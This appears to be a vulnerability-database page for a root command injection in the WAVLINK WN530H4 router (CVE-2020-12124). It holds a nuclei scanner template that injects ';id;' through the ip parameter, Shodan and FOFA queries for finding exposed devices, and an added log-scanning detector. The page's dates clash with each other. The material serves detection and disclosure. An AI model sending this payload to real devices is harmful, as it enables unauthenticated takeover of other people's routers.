WAVLINK WN530H4 live_api.cgi - Command Injection

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

A command injection in the WAVLINK WN530H4 live_api.cgi endpoint allows remote attackers to execute arbitrary Linux commands as root without authentication.

Related
Reporter | Title | Published | Family
Circl | CVE-2020-12124 | 20 Dec 2023 15:42 | circl
CVE | CVE-2020-12124 | 2 Oct 2020 08:11 | cve
Cvelist | CVE-2020-12124 | 2 Oct 2020 08:11 | cvelist
NVD | CVE-2020-12124 | 2 Oct 2020 09:15 | nvd
OSV | CVE-2020-12124 | 2 Oct 2020 09:15 | osv
Prion | Design/Logic Flaw | 2 Oct 2020 09:15 | prion
RedhatCVE | CVE-2020-12124 | 9 Jan 2026 09:56 | redhatcve
VulnCheck KEV | VulnCheck KEV: CVE-2020-12124 | 30 Mar 2024 00:00 | vulncheck_kev

id: CVE-2020-12124

info:
  name: WAVLINK WN530H4 live_api.cgi - Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary Linux commands as root on the WAVLINK WN530H4 device, potentially leading to complete system compromise, data theft, or using the device as a pivot point for further attacks.
  remediation: |
    Apply vendor security patches if available or replace the device with a secure alternative. Restrict access to the management interface.
  reference:
    - https://github.com/db44k/CVE-2020-12124
    - https://cerne.xyz/bugs/CVE-2020-12124
    - https://www.wavlink.com/en_us/product/WL-WN530H4.html
    - https://github.com/Scorpion-Security-Labs/CVE-2020-12124
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12124
    cwe-id: CWE-78
    epss-score: 0.75215
    epss-percentile: 0.99452
    cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wavlink
    product: wn530h4_firmware
    shodan-query: http.html:"wavlink"
    fofa-query: body="wavlink"
  tags: cve,cve2020,rce,wavlink,vkev,vuln
variables:
  str: "{{rand_base(3)}}"
  num: "{{rand_int(1, 10)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

      - type: word
        part: body
        words:
          - "WiFiBand"

      - type: status
        status:
          - 200
# digest: 490a00463044022038e6c301d0fc98edc1b5eb7648359f4274be2c1f8b5e2d2ec5508934409fa6c2022063c21f7b7facf65d430bc5a0bdb40f850b5401886255ece6cba57bbc2ab19842:922c64590222798bb761d5b6d8e72950
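
A defender-side check for the request pattern the template sends, as an added example (not part of the template or of ProjectDiscovery's code): it scans proxy or web-server access-log lines for requests to /cgi-bin/live_api.cgi whose ip parameter is not a plain IP address. The combined log format, the sample lines and the assumption that ip normally carries an address are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/cgi-bin/live_api.cgi"  # path taken from the template above
# Source address and request target of a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def is_plain_ip(value):
    """True only when the value parses as an IPv4 or IPv6 literal."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def suspicious_requests(lines):
    """Return (source, decoded ip value) for endpoint hits whose ip is not an address."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        if url.path != ENDPOINT:
            continue
        # parse_qs percent-decodes, so %3Bid%3B is compared as ;id;
        # separator="&" keeps ';' inside the value instead of splitting on it.
        params = parse_qs(url.query, keep_blank_values=True, separator="&")
        for value in params.get("ip", []):
            if not is_plain_ip(value):  # allowlist: anything but an address is flagged
                hits.append((m.group("src"), value))
    return hits

# Constructed sample log lines (documentation address ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jul/2026:03:00:48 +0000] "GET /cgi-bin/live_api.cgi?page=abc&id=3&ip=192.168.10.1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/Jul/2026:03:01:02 +0000] "GET /cgi-bin/live_api.cgi?page=xyz&id=7&ip=;id; HTTP/1.1" 200 640',
    '198.51.100.7 - - [04/Jul/2026:03:01:05 +0000] "GET /cgi-bin/live_api.cgi?page=xyz&id=7&ip=%3Bid%3B HTTP/1.1" 200 640',
    '203.0.113.5 - - [04/Jul/2026:03:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for src, value in suspicious_requests(SAMPLE_LOG):
        print(f"{src} sent non-address ip value {value!r}")
```

Validating the parameter against an address allowlist catches encoded and unencoded variants alike, which a list of shell metacharacters would not guarantee.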


04 Feb 2026 07:00 (current)
Vulners AI Score: 7.5 (High risk)
CVSS 3.1: 9.8
CVSS 2: 10
EPSS: 0.75215